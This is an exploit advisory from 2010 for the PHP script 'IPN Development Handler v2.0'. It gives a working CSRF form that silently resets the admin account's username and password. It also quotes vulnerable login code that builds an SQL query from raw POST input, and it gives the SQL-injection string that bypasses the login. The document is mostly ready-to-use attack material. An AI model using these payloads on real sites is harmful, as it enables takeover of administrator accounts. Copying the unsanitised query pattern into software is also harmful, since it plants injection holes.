IPN Development Handler v2.0 Multiple Vulnerabilities

2010-12-23 10:15:21

IPN Development Handler v2.0 CSRF (Change Admin Account)

.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/


===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/siteadmin/EditInfo.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="s1" value="Update"/>



IPN Development Handler v2.0 Auth Bypass

.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/


===[ Vulnerability ]===
Source Code path/siteadmin/login.php

$MyUsername1 = strip_tags($_POST[username1]);
$MyPassword1 = strip_tags($_POST[password1]);

if(empty($MyUsername1) || empty($MyPassword1))
$MyError = "<center><font color=red size=2 face=verdana><b>All fields are required!</b></font></center>";
//check the login info if exists
$q1 = "select * from dd_admin where username = '$MyUsername1' and password = '$MyPassword1' ";

$r1 = mysql_query($q1);

echo mysql_error();

===[ Exploit ]===

1- Go to Siteadmin [www.site.com/siteadmin/login.php]
2- join code Auth Bypass in Username & Password
3- Username: 'or'a'='a
Password: 'or'a'='a

===[ Example ]===

Username: 'or'a'='a
Password: 'or'a'='a


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